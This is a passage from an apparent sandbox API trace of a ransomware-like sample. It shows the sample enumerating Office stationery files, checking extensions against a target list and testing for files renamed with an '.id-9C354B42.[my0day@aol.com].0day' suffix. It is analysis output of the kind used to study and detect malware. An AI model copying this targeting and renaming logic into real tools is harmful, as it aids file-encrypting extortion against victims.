Tag\\METCONV.TXT") returned 68 [0042.258] lstrlenW (lpString=".zip") returned 4 [0042.258] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0042.258] lstrlenW (lpString=".rar") returned 4 [0042.258] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0042.258] lstrlenW (lpString=".bz2") returned 4 [0042.258] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0042.258] lstrlenW (lpString=".7z") returned 3 [0042.258] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0042.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.258] lstrlenW (lpString=".dbf") returned 4 [0042.258] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0042.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.258] lstrlenW (lpString=".1cd") returned 4 [0042.258] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0042.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.258] lstrlenW (lpString=".jpg") returned 4 [0042.258] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0042.258] lstrcmpiW (lpString1=".htm", lpString2=".0day") returned 1 [0042.258] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0042.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0042.508] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=237) returned 1 [0042.509] CloseHandle (hObject=0x188) returned 1 [0042.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0042.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.509] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.509] lstrlenW (lpString=".doc") returned 4 [0042.509] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.509] lstrlenW (lpString=".docx") returned 5 [0042.509] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.509] lstrlenW (lpString=".pdf") returned 4 [0042.509] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.509] lstrlenW (lpString=".xls") returned 4 [0042.509] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.509] lstrlenW (lpString=".xlsx") returned 5 [0042.509] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.509] lstrlenW (lpString=".ppt") returned 4 [0042.509] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.509] lstrlenW (lpString=".zip") returned 4 [0042.509] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.509] lstrlenW (lpString=".rar") returned 4 [0042.509] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.509] lstrlenW (lpString=".bz2") returned 4 [0042.509] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.509] lstrlenW (lpString=".7z") returned 3 [0042.509] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.510] lstrlenW (lpString=".dbf") returned 4 [0042.510] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.510] lstrlenW (lpString=".1cd") returned 4 [0042.510] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.510] lstrlenW (lpString=".jpg") returned 4 [0042.510] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.510] lstrlenW (lpString=".doc") returned 4 [0042.510] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.510] lstrlenW (lpString=".docx") returned 5 [0042.510] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.510] lstrlenW (lpString=".pdf") returned 4 [0042.510] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.510] lstrlenW (lpString=".xls") returned 4 [0042.510] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.510] lstrlenW (lpString=".xlsx") returned 5 [0042.510] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.510] lstrlenW (lpString=".ppt") returned 4 [0042.510] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.510] lstrlenW (lpString=".zip") returned 4 [0042.510] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.510] lstrlenW (lpString=".rar") returned 4 [0042.510] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.510] lstrlenW (lpString=".bz2") returned 4 [0042.510] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.510] lstrlenW (lpString=".7z") returned 3 [0042.510] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.510] lstrlenW (lpString=".dbf") returned 4 [0042.510] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.511] lstrlenW (lpString=".1cd") returned 4 [0042.511] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.511] lstrlenW (lpString=".jpg") returned 4 [0042.511] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.511] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0042.511] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0042.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0042.511] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=6406) returned 1 [0042.511] CloseHandle (hObject=0x188) returned 1 [0042.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0042.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.512] lstrlenW (lpString=".doc") returned 4 [0042.512] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.512] lstrlenW (lpString=".docx") returned 5 [0042.512] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.512] lstrlenW (lpString=".pdf") returned 4 [0042.512] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.512] lstrlenW (lpString=".xls") returned 4 [0042.512] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.512] lstrlenW (lpString=".xlsx") returned 5 [0042.512] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.512] lstrlenW (lpString=".ppt") returned 4 [0042.512] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.512] lstrlenW (lpString=".zip") returned 4 [0042.512] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.512] lstrlenW (lpString=".rar") returned 4 [0042.512] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.512] lstrlenW (lpString=".bz2") returned 4 [0042.512] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.512] lstrlenW (lpString=".7z") returned 3 [0042.512] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.512] lstrlenW (lpString=".dbf") returned 4 [0042.512] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.512] lstrlenW (lpString=".1cd") returned 4 [0042.512] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.512] lstrlenW (lpString=".jpg") returned 4 [0042.512] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.513] lstrlenW (lpString=".doc") returned 4 [0042.513] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.513] lstrlenW (lpString=".docx") returned 5 [0042.513] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.513] lstrlenW (lpString=".pdf") returned 4 [0042.513] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.513] lstrlenW (lpString=".xls") returned 4 [0042.513] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.513] lstrlenW (lpString=".xlsx") returned 5 [0042.513] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.513] lstrlenW (lpString=".ppt") returned 4 [0042.513] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.513] lstrlenW (lpString=".zip") returned 4 [0042.513] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.513] lstrlenW (lpString=".rar") returned 4 [0042.513] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.513] lstrlenW (lpString=".bz2") returned 4 [0042.513] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.513] lstrlenW (lpString=".7z") returned 3 [0042.513] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.513] lstrlenW (lpString=".dbf") returned 4 [0042.513] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.513] lstrlenW (lpString=".1cd") returned 4 [0042.513] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.513] lstrlenW (lpString=".jpg") returned 4 [0042.513] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.514] lstrcmpiW (lpString1=".wmf", lpString2=".0day") returned 1 [0042.514] lstrlenW (lpString="grid_(cm).wmf") returned 13 [0042.514] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0042.514] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2920) returned 1 [0042.514] CloseHandle (hObject=0x188) returned 1 [0042.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf")) returned 0x20 [0042.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.514] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.514] lstrlenW (lpString=".doc") returned 4 [0042.514] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.514] lstrlenW (lpString=".docx") returned 5 [0042.514] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.514] lstrlenW (lpString=".pdf") returned 4 [0042.514] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.514] lstrlenW (lpString=".xls") returned 4 [0042.514] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.514] lstrlenW (lpString=".xlsx") returned 5 [0042.514] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.514] lstrlenW (lpString=".ppt") returned 4 [0042.514] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.515] lstrlenW (lpString=".zip") returned 4 [0042.515] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.515] lstrlenW (lpString=".rar") returned 4 [0042.515] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.515] lstrlenW (lpString=".bz2") returned 4 [0042.515] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.515] lstrlenW (lpString=".7z") returned 3 [0042.515] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.515] lstrlenW (lpString=".dbf") returned 4 [0042.515] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.515] lstrlenW (lpString=".1cd") returned 4 [0042.515] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.515] lstrlenW (lpString=".jpg") returned 4 [0042.515] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.515] lstrlenW (lpString=".doc") returned 4 [0042.515] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.515] lstrlenW (lpString=".docx") returned 5 [0042.515] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.515] lstrlenW (lpString=".pdf") returned 4 [0042.515] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.515] lstrlenW (lpString=".xls") returned 4 [0042.515] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.515] lstrlenW (lpString=".xlsx") returned 5 [0042.515] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.515] lstrlenW (lpString=".ppt") returned 4 [0042.515] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.516] lstrlenW (lpString=".zip") returned 4 [0042.516] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.516] lstrlenW (lpString=".rar") returned 4 [0042.516] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.516] lstrlenW (lpString=".bz2") returned 4 [0042.516] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.516] lstrlenW (lpString=".7z") returned 3 [0042.516] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.516] lstrlenW (lpString=".dbf") returned 4 [0042.516] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.516] lstrlenW (lpString=".1cd") returned 4 [0042.516] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.516] lstrlenW (lpString=".jpg") returned 4 [0042.516] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.516] lstrcmpiW (lpString1=".wmf", lpString2=".0day") returned 1 [0042.516] lstrlenW (lpString="grid_(inch).wmf") returned 15 [0042.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0042.517] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=7498) returned 1 [0042.517] CloseHandle (hObject=0x188) returned 1 [0042.517] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf")) returned 0x20 [0042.517] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.517] lstrlenW (lpString=".doc") returned 4 [0042.517] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.517] lstrlenW (lpString=".docx") returned 5 [0042.517] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.517] lstrlenW (lpString=".pdf") returned 4 [0042.517] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.517] lstrlenW (lpString=".xls") returned 4 [0042.517] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.517] lstrlenW (lpString=".xlsx") returned 5 [0042.517] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.517] lstrlenW (lpString=".ppt") returned 4 [0042.517] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.517] lstrlenW (lpString=".zip") returned 4 [0042.518] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.518] lstrlenW (lpString=".rar") returned 4 [0042.518] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.518] lstrlenW (lpString=".bz2") returned 4 [0042.518] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.518] lstrlenW (lpString=".7z") returned 3 [0042.518] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.518] lstrlenW (lpString=".dbf") returned 4 [0042.518] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.518] lstrlenW (lpString=".1cd") returned 4 [0042.518] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.518] lstrlenW (lpString=".jpg") returned 4 [0042.518] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.518] lstrlenW (lpString=".doc") returned 4 [0042.518] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.518] lstrlenW (lpString=".docx") returned 5 [0042.518] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.518] lstrlenW (lpString=".pdf") returned 4 [0042.518] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.518] lstrlenW (lpString=".xls") returned 4 [0042.518] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.518] lstrlenW (lpString=".xlsx") returned 5 [0042.518] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.518] lstrlenW (lpString=".ppt") returned 4 [0042.518] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.518] lstrlenW (lpString=".zip") returned 4 [0042.519] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.519] lstrlenW (lpString=".rar") returned 4 [0042.519] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.519] lstrlenW (lpString=".bz2") returned 4 [0042.519] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.519] lstrlenW (lpString=".7z") returned 3 [0042.519] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.519] lstrlenW (lpString=".dbf") returned 4 [0042.519] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.519] lstrlenW (lpString=".1cd") returned 4 [0042.519] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.519] lstrlenW (lpString=".jpg") returned 4 [0042.519] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.519] lstrcmpiW (lpString1=".htm", lpString2=".0day") returned 1 [0042.519] lstrlenW (lpString="Hand Prints.htm") returned 15 [0042.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.609] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=235) returned 1 [0042.609] CloseHandle (hObject=0x174) returned 1 [0042.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20 [0042.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.609] lstrlenW (lpString=".doc") returned 4 